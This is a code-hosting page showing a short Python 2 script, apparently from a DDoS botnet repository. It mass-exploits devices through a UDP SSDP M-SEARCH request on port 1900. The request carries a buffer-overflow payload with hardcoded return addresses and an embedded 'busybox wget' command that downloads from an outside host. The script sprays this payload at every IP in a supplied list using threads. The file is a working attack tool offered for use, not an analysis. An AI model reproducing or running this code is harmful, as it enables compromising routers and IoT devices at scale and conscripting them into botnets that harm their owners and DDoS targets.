Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/IPMI/load_ipmi.py
5038 views
1
#! python !#
2
import threading, sys, time, random, socket, re, os, struct, array, requests
3
buffer = "\"" + "A"*140 + "\x8c\xdd\x0a\x40" + "A"*139 + "\x78\xfe\xff\xff" + "A"*16 + "\xf8\xda\x09\x40" + "A"*8 + "\xac\xb0\x0d\x40\x68\x55\x0a\x40" + "A"*108 + "sleep 1;busybox wget https://i.imger.me/8c393eaa9.gif;exit;#" + "A"*1307 + "\""
4
ips = open(sys.argv[1], "r").readlines()
5
commandpayload = "M-SEARCH * HTTP/1.1\r\nHost:239.255.255.250:1900\r\nST:uuid:schemas:device:" + buffer + ":end\r\nMan:\"ssdp:discover\"\r\nMX:3\r\n\r\n"
6
7
class netis(threading.Thread):
8
def __init__ (self, ip):
9
threading.Thread.__init__(self)
10
self.ip = str(ip).rstrip('\n')
11
def run(self):
12
try:
13
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
14
print "Attempting %s"%(self.ip)
15
s.sendto(commandpayload, (self.ip, 1900))
16
time.sleep(1)
17
except Exception:
18
pass
19
20
for ip in ips:
21
try:
22
n = netis(ip)
23
n.start()
24
time.sleep(0.01)
25
except:
26
pass
27